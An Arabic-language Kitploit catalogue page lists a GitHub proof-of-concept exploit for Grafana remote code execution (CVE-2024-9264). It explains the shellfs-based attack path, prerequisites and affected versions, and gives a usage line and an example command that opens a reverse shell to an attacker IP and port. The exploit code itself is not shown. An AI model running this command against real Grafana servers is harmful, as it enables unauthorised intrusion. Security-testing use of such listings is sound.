Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-9264-RCE-Exploit — استغلال Grafana لثغرة RCE (CVE-2024-9264) | Kitploit
أدوات/GitHubGitHub/z3k0sec/cve-2024-9264-rce-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubz3k0sec/cve-2024-9264-rce-exploit

CVE-2024-9264-RCE-Exploit

استغلال Grafana لثغرة RCE (CVE-2024-9264)

عرض المستودع
3951منذ سنة واحدةتمت المراجعة من قبل Kitploit
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9264-RCE-Exploit في Grafana عبر SQL Expressions

الوصف

إثبات المفهوم لتنفيذ التعليمات البرمجية عن بُعد في Grafana (CVE-2024-9264)

يحتوي هذا المستودع على سكربت بلغة Python يستغل ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في ميزة تعبيرات SQL الخاصة بـ Grafana. من خلال استغلال ضعف تعقيم المدخلات، يتيح هذا الاستغلال للمهاجم تنفيذ أوامر شل عشوائية على الخادم. هذا ممكن عبر امتداد المجتمع shellfs، الذي يمكن للمهاجم تثبيته وتحميله لتسهيل تنفيذ الأوامر.

المتطلبات الأساسية

  • مستخدم Grafana مصادق عليه بصلاحيات Viewer أو أعلى
  • يجب تثبيت الملف الثنائي الخاص بـ DuckDB وأن يكون متاحًا عبر PATH الخاص بـ Grafana

الإصدارات المتأثرة

Grafana >= v11.0.0 (جميع إصدارات v11.x.y متأثرة)

الاستخدام

python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

مثال

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

إخلاء مسؤولية

هذا السكربت مُعد للأغراض التعليمية وللاستخدام في بيئات خاضعة للتحكم حيث تمتلك الإذن لاختبار أمان النظام. قد يؤدي إساءة استخدام هذه الأداة إلى عواقب قانونية.

المزيد

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

تنزيل الأداة